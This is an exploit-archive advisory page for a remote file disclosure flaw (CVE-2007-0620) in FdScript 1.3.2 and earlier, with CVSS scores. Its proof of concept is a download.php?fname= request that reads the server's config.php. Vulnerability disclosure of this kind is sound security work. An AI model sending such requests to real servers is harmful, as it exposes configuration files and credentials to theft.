FdScript <= v1.3.2 Remote File Disclosure Vulnerability

Published
Credit
Risk
2007.02.01
ajann
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0620
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

************************************************************************
*******
# Title : FdScript <= v1.3.2 Remote File Disclosure Vulnerability
# Author : ajann
# Contact : :(
# Site : http://stud.usv.ro/~vlad_l/
# $$ : Free

************************************************************************
*******

[[SOURCE]]]---------------------------------------------------------

http://[target]/[path]//download.php?fname=[SOURCE FILE]

Example:

//download.php?fname=./indexfiles/config.php
[[/SOURCE]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2015, cxsecurity.com